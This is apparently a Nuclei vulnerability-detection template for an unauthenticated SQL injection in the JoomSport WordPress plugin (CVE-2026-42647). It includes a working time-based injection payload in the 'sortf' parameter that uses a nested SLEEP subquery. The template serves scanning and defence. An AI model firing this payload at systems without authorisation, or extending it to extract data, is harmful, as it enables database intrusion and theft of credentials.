id: CVE-2026-42647

info:
  name: JoomSport <= 5.7.7 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The JoomSport WordPress plugin through 5.7.7 is vulnerable to unauthenticated time-based blind SQL injection via the 'sortf' GET parameter in the player list view. The parameter value is backtick-wrapped and directly concatenated into an ORDER BY clause.
  impact: |
    Unauthenticated attackers can extract any data from the WordPress database including admin credentials, user emails, and plugin-stored secrets via time-based blind SQL injection.
  remediation: |
    Update to JoomSport version 5.7.8 or later, which implements column whitelist validation.
  reference:
    - https://patchstack.com/database/wordpress/plugin/joomsport-sports-league-results-management/vulnerability/wordpress-joomsport-plugin-5-7-7-sql-injection-vulnerability
    - https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/tags/5.7.5/sportleague/base/wordpress/classes/class-jsport-getplayers.php#L153
    - https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/tags/5.7.5/sportleague/classes/objects/class-jsport-playerlist.php#L80
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42647
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2026-42647
    epss-score: 0.0518
    epss-percentile: 0.90165
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
    vendor: beardev
    product: joomsport-sports-league-results-management
    framework: wordpress
  tags: cve,cve2026,wp,wordpress,wp-plugin,joomsport,sqli,vkev

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-sitemap-posts-joomsport_season-1.xml"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "<loc>")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: season_path
        part: body
        group: 1
        regex:
          - '<loc>[^<]*?//[^/]+(\/[^<]+)</loc>'
        internal: true

  - raw:
      - |
        GET {{season_path}}?action=playerlist&sortf=post_title&sortd=ASC HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Name", "Match played", "Played minutes")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET {{season_path}}?action=playerlist&sortf=post_title%60,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)%23&sortd=ASC HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
          - 'contains_all(body, "Name", "Match played", "Played minutes")'
        condition: and
# digest: 4a0a004730450220786e5501be7ffc479ae2dbb72c9eb7f9e7e6c258fc1a70bf44dae91625176dd30221008ed71ce4003c6ba412efd6d1b32bee5d9c2db2012f624d962d361cc9c24bf33d:922c64590222798bb761d5b6d8e72950